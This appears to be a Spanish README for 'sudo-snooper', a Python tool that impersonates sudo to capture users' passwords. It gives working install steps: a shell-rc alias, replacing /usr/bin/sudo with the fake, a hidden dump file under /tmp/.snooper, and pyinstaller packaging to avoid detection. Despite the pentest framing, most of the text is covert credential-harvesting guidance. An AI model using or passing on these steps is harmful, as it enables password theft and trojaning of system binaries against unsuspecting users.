
Script en Python que actúa como el binario sudo original para engañar a los usuarios y hacer que introduzcan sus contraseñas
sudo-snooper actúa como el binario sudo original para engañar a los usuarios y hacer que introduzcan sus contraseñas.
Mostrará un prompt falso similar al original para que el usuario introduzca su contraseña sudo.
Esto puede ser útil en pruebas de penetración o evaluaciones de seguridad para comprobar el conocimiento del usuario.
Esta opción es más fácil de realizar y más portable, aunque puede ser más perceptible para usuarios cuidadosos.
Edite el archivo .rc del shell que está usando el usuario (puede ser .bashrc, .zshrc, etc.) y añada lo siguiente:
alias sudo='python3 /path/to/sudo-snooper.py'
Asegúrese de que sudo-snooper.py tenga los permisos correctos.
Necesita acceso root para esta opción de instalación
Esto solo es útil si ya tiene acceso root pero no puede descifrar los
hashes de /etc/shadow por alguna razón. Básicamente puede obtener la contraseña del usuario mediante phishing.
# mv /usr/bin/sudo /usr/bin/somename
Cambie estos en sudo-snooper.py:
dumpdir = "/tmp/.snooper"
dumpfile = "/tmp/.snooper/dump.txt"
sudo = 'sudo'
# install -dm755 sudo-snooper.py /usr/bin/sudo
Asigne los permisos necesarios al archivo python
Puede ser más creativo aquí y crear un archivo ejecutable no legible para los usuarios, pero no voy a entrar en eso. Consulte algunas de las respuestas aquí para más información.
NOTA: Una forma un poco más convincente de instalar esto es compilarlo usando pyinstaller para que no aparezca como un archivo python cuando se ejecute file /usr/bin/sudo.
Para hacerlo en Archlinux: pyinstaller --onefile sudo-snooper.py funcionará. Sin embargo, tenga en cuenta que una vez compilado, no podrá cambiar los parámetros en el binario compilado.
Una vez instalado, sudo-snooper se puede invocar igual que el sudo normal.
Por ejemplo, ejecutar
sudo vim /etc/resolv.conf
resultará en que se llame a sudo-snooper (asumiendo que esté correctamente instalado).
Pedirá la contraseña del usuario y luego ejecutará el comando redirigiendo al binario sudo real si la contraseña es correcta.
Luego podrá recuperar la contraseña del usuario leyendo el archivo de volcado en la configuración.